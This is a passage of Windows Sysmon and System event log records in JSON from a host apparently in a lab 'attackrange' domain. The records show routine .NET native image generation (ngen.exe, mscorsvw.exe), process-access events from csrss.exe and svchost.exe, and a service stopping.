C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:03.274","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-042F-5F25-0000-00101DB00B00}","TargetProcessId":"2848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:03.290\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-042F-5F25-0000-00101DB00B00}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:03.290","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-042F-5F25-0000-00101DB00B00}","TargetProcessId":"2848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76864,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Tile Data model server service entered the stopped state.","param1":"Tile Data model server","param2":"stopped","EventReceivedTime":"2020-08-01 05:57:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:12.634\r\nProcessGuid: {A837DB8D-042F-5F25-0000-00101DB00B00}\r\nProcessId: 2848\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b20-0\\System.Windows.Forms.dll\r\nCreationUtcTime: 2020-08-01 05:57:12.634","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:12.634","ProcessGuid":"{A837DB8D-042F-5F25-0000-00101DB00B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b20-0\\System.Windows.Forms.dll","CreationUtcTime":"2020-08-01 05:57:12.634","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:12.868\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0438-5F25-0000-0010B8B60B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:12.868","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0438-5F25-0000-0010B8B60B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:12.868\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0438-5F25-0000-0010B8B60B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:12.868","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0438-5F25-0000-0010B8B60B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:12.884\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0438-5F25-0000-0010B8B60B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:12.884","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0438-5F25-0000-0010B8B60B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.149\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-001074BA0B00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.149","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-001074BA0B00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.149\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-001074BA0B00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.149","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-001074BA0B00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.149\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-001074BA0B00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.149","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-001074BA0B00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.399\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 